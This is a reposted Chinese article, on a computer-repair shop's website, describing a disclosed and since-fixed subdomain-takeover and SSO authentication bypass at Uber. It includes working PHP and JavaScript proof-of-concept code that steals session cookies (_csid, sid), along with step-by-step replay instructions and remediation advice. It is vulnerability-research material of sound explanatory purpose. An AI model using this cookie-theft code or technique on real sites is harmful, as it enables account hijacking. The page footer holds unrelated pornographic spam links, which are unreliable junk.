錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
通過子域名接管繞過Uber的SSO認證

作者: 佚名  日期:2017-07-17 15:34:02   來源: 本站整理

 Uber的saostatic.uber.com節點存在安全漏洞,攻擊者可以利用該漏洞通過Amazon CloudFront CDN實現子域名接管。除此之外,Uber近期在auth.uber.com部署的單點登錄(SSO)系統中也存在安全問題。這種SSO系統可以通過在所有*.uber.com子域名之間共享cookie來實現單點登錄,但其中存在的安全問題將允許攻擊者通過任意一個被入侵的*.uber.com子域名來竊取會話cookie。因此,之前的子域名接管問題將會提升為Uber SSO系統的身份認證繞過問題。目前,Uber已經修復了這個子域名接管漏洞,并且專門為這兩個安全問題提供了5000美金的漏洞獎金。
單點登錄系統(SSO)的安全問題
一般來說,單點登錄系統主要有以下三種類型:
1.   OAuth:認證的安全性主要是通過在白名單中設置服務提供者的URL回調地址實現的,其中CSRF保護是通過“state”參數實現的,可能存在的漏洞一般是開放重定向鏈。【案例】
2.   SAML&Friends:安全性是基于XML信息加密實現的,加密使用的是服務與識別提供商之間預交換的加密密鑰,可能存在的漏洞一般是XML簽名繞過。【案例】
3.   子域名之間共享會話cookie:這類SSO系統的安全性取決于所有子域名的整體安全性。任何一個子域名中如果存在漏洞的話,攻擊者將有可能竊取到SSO系統的共享會話cookie,可能存在的漏洞一般是遠程代碼執行漏洞、調式日志泄露和子域名接管等等。【案例】
我個人認為,前兩種單點登錄系統以前確實存在很多安全問題,但現在這兩類系統的安全性都已經得到了很大程度的提升。相比來說,第三種SSO系統出現得比前兩種都要早。從設計角度來看,任何需要利用SSO系統完成認證的節點都必須是同一個頂級域名下的子域名,由于這種SSO系統的安全性取決于所有子域名的整體安全性,所以這類SSO系統的攻擊面也非常廣。
Uber案例
在此之前,Uber使用的是OAuth來作為*.uber.com子域名的SSO系統,但近期他們將*.uber.com子域名的SSO系統換成了基于共享會話cookie的SSO系統。如果你現在訪問任何一個需要進行身份驗證的uber.com子域名的話,你都會被重定向到auth.uber.com。當你在這個節點完成登錄之后再訪問其他子域名的話,你相當于通過SSO系統登陸了auth.uber.com,因為當用戶登錄了一次之后,SSO系統便會為每一個*.uber.com子域名發送臨時會話cookie。
但是研究人員在Uber的這個SSO系統中發現了一個安全漏洞,當目標用戶在SSO系統中完成了身份驗證之后,該漏洞將允許攻擊者竊取auth.uber.com發送給任意uber.com子域名的有效會話cookie。不過Uber也采取了一些措施來防止這種事情的發生,但這些措施都可以被繞過。再加上研究人員報告的子域名接管漏洞,這將意味著任何被入侵的*.uber.com子域名都可以用來執行這種SSO認證繞過攻擊。
子域名接管
子域名saostatic.uber.com指向的是Amazon Cloudfront CDN(通過DNS CNAME記錄),但是主機名并沒有進行過注冊,這也就意味著我可以完全接管這個域名。在進行了一番探索之后,我成功接管了Uber的一個子域名,并上傳了一個簡單的HTML頁面來作為PoC:

認證繞過
在Uber的SSO系統中,auth.uber.com作為一個身份提供者給https://*.uber.com提供臨時共享會話cookie,并與服務提供者(例如riders.uber.com, partners.uber.com, central.uber.com, vault.uber.com和developer.uber.com等等)進行身份信息的驗證。服務提供者在自己的節點中立刻清除傳入的臨時共享會話cookie來降低cookie被竊取的可能性。下圖顯示的是Uber SSO系統的用戶登錄流程:

因此,共享會話cookie“_csid”只能在第九步至第十二步之間被竊取,而這是一個間隔非常短的時間周期,雖然這并非不能實現,但我們還發現了另一種更加容易利用的漏洞。在這個漏洞的幫助下,我們可以讓共享會話cookie在第十二步之后仍然保存在瀏覽器的cookie記錄中。問題就在于,如果目標用戶已經在https://riders.uber.com節點完成了登錄,那么此時當這個用戶又接收到了一個從auth.uber.com發來的新生成的有效共享會話cookie“_csid”時,這個新的cookie將會被忽略,并且仍保持有效。由于在瀏覽器清除保存的cookie內容之前,這個被忽略的cookie將一直有效,因此攻擊者就可以通過重放上圖的第三步并在第十三步的請求中添加一個指向https://saostatic.uber.com的隱藏請求,他們就可以竊取到寶貴的會話cookie了:

當攻擊者得到了目標用戶的共享會話cookie“_csid”(例如https://riders.uber.com的cookie)之后,攻擊者就可以在他們自己的瀏覽器中完成正常的登錄流程,即替換上圖中第九步的“_csid” cookie值并冒充用戶進行登錄。不過別著急,這只是理想狀態,因為Uber在這里還采取了一種名叫登錄跨站請求偽造保護的應對措施。下面給出的是更新后的Uber SSO登錄流程:

問題就在于這里的GET參數state=CSRFTOKEN,而狀態cookie是服務提供者https://riders.uber.com在第三步中添加的,并在第十一步進行驗證。由于我們無法從目標用戶的瀏覽器中竊取這些cookie值,但我們的目標又是共享會話cookie“_csid”,那這是否就意味著Game Over了呢?
當然不是!因為攻擊者可以通過正常的登錄操作從https://riders.uber.com獲取到正確的CSRFTOKEN值(state cookie),那么攻擊者就能夠在自己的瀏覽器中將https://riders.uber.com在第三步生成的auth.uber.com URL鏈接轉發至目標用戶的流啊理念其中,然后生成并竊取共享會話cookie “_csid”,最后按照第九步的操作將這些竊取來的值注入到自己瀏覽器的登錄場景中。通過這種方法,目標用戶將會生成臨時會話令牌"_csid",而攻擊者就可以在另一個瀏覽器中利用這個token。攻擊的實現過程如下圖所示:
PoC
再多的流程圖也比不過一個PoC來得清楚。
攻擊演示流程:
1.   打開目標用戶的瀏覽器,訪問https://riders.uber.com。在被重定向到了https://auth.uber.com之后,使用用戶的憑證完成登錄,最終重新回到https://riders.uber.com儀表盤。
2.   在目標用戶的瀏覽器中打開另一個網頁標簽,訪問https://saostatic.uber.com/prepareuberattack.php。無論彈出什么對話框,都點擊“接受”,頁面完成加載之后,你就可以看到底部會出現一個URL、“Cookie:”和“Set-Cookie:”,這便是我們自動竊取來的所有登錄信息。
3.   打開攻擊者的瀏覽器,然后設置一個攔截代理來攔截請求和響應信息。訪問prepareuberattack.php頁面輸出的URL鏈接,然后攔截請求。最后,將prepareuberattack.php頁面中顯示的“Cookie:”信息拷貝到請求頭中。
4.   響應信息應該是指向https://riders.uber.com/trips的重定向鏈接,這表明我們成功繞過了Uber的身份認證。接下來,在響應信息到達瀏覽器之前將“Set-Cookie:”所有的內容拷貝到響應信息中,這樣將保證竊取來的cookie永久注入到了攻擊者的瀏覽器中。
5.   現在,攻擊者就已經在自己的瀏覽器中以目標用戶的身份完成了登錄。
攻擊演示視頻如下:
視頻地址: https://youtu.be/0LoQ1rZfyP4
在真實的攻擊場景中,攻擊者可以在目標用戶的瀏覽器中(例如通過iframe)悄悄加載https://saostatic.uber.com/prepareuberattack.php。攻擊者可以直接將竊取來的cookie信息保存在服務器端,而無須顯示在prepareuberattack.php頁面中。下面給出的是頁面https://saostatic.uber.com/prepareuberattack.php和頁面https://saostatic.uber.com/uberattack.php的代碼。雖然代碼寫的不是很好,但它的功能是沒問題的:
prepareuberattack.php
    function HandleHeaderLine( $curl, $header_line ) {
        preg_match("/state=([^;]*);/", $header_line, $matches);
    if(sizeof($matches) > 0) {
        print("var cookiestate = '" . $matches[1] . "';\n");
    }
    preg_match("/Location: (.*)/", $header_line, $matches);
    if(sizeof($matches) > 0) {
        print("var loc = '" . trim($matches[1]) . "';\n");
    }
    return strlen($header_line);
    }   
    $c = curl_init('https://riders.uber.com');
    curl_setopt($c, CURLOPT_VERBOSE, 1);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($c, CURLOPT_HEADERFUNCTION, "HandleHeaderLine");
    $page = curl_exec($c);
?>
var csrf = loc.substring(loc.lastIndexOf("=")+1);
var img = document.createElement("IMG");
img.onerror = function () {
    var iframe = document.createElement("iframe");
    iframe.setAttribute("src","https://saostatic.uber.com/uberattack.php?cookiestate=" + encodeURIComponent(cookiestate) + "&csrftoken=" + csrf);
    iframe.setAttribute("width", "100%");
    iframe.setAttribute("height", "10000");
    document.body.appendChild(iframe); 
}
img.src=loc;
uberattack.php
    $cookiestring = "state=" . $_GET["cookiestate"] . "; ";
    $interestincookies = array("_udid", "_csid", "sid");
    foreach ($_COOKIE as $name => $value) {
    if (in_array($name,$interestincookies)) {   
        $cookiestring = $cookiestring . $name . "=" . str_replace(' ', '+', $value) .  "; ";
        $cookiestringset = $cookiestringset . "Set-Cookie: " . $name . "=" . str_replace(' ', '+', $value) .  ";";
        }
    }
    print "Url: " . 'https://riders.uber.com/?state=' . urlencode($_GET["csrftoken"]) . "";
    print "Cookie: " . $cookiestring . "";
    print "" . $cookiestringset . "";
   
?>
第一個文件可以托管在任何地方,第二個文件必須托管在劫持的子域名中。我們可以將這兩份PHP文件中的“riders.uber.com”改為其他的Uber子域名,例如vault.uber.com、partners.uber.com和developer.uber.com。
修復建議
我們提供給Uber的建議主要有以下兩個方面:
1.   通過移除指向AWS CloudFront CDN的無效CNAME記錄來解決saostatic.uber.com的子域名接管問題。
2.   通過以下幾種方法解決身份認證繞過問題:
a)   將SSO系統恢復為使用OAuth 2協議;
b)   引入IP地址檢測機制;
c)    將所有的*.uber.com子域名加入Uber的漏洞獎勵計劃范疇;
最終,Uber移除了不安全的CNAME記錄,并通過引入IP地址檢測機制來降低了Uber SSO系統的攻擊面。
 




熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 亚洲精品无码人妻无码| 免费无码国产在线观国内自拍中文字幕 | 久久亚洲AV成人无码国产电影| 无码国产精品一区二区免费式直播 | 亚洲AV永久青草无码精品| 亚洲av无码片区一区二区三区| 无码丰满熟妇一区二区| 无码无遮挡又大又爽又黄的视频| 亚洲日韩精品A∨片无码加勒比| 亚洲无码视频在线| 无码GOGO大胆啪啪艺术| 国产福利电影一区二区三区久久老子无码午夜伦不 | 国产成人无码精品久久久露脸| 亚洲精品色午夜无码专区日韩| 国产精品无码制服丝袜| 在线观看无码不卡AV| 亚洲AV永久无码精品| 中文有码vs无码人妻| 日韩AV片无码一区二区不卡| 日韩人妻无码一区二区三区久久| 人妻少妇无码视频在线| 亚洲av无码专区亚洲av不卡| 亚洲AV无码国产丝袜在线观看 | 国产成人无码a区在线视频| 亚洲精品无码久久久久久| 人妻中文字系列无码专区| 中文无码久久精品| 国产免费久久久久久无码| 国产成人无码精品久久久露脸| 成年男人裸j照无遮挡无码| 亚洲精品无码成人片久久不卡| 久久国产精品无码一区二区三区| 日韩人妻无码精品久久久不卡| 亚洲AV无码一区二区三区DV| 无码人妻精品一区二区三区99仓本| 国产色无码专区在线观看| 中文无码喷潮在线播放| 亚洲VA中文字幕无码毛片| 久久精品亚洲中文字幕无码网站 | 丰满日韩放荡少妇无码视频| heyzo专区无码综合|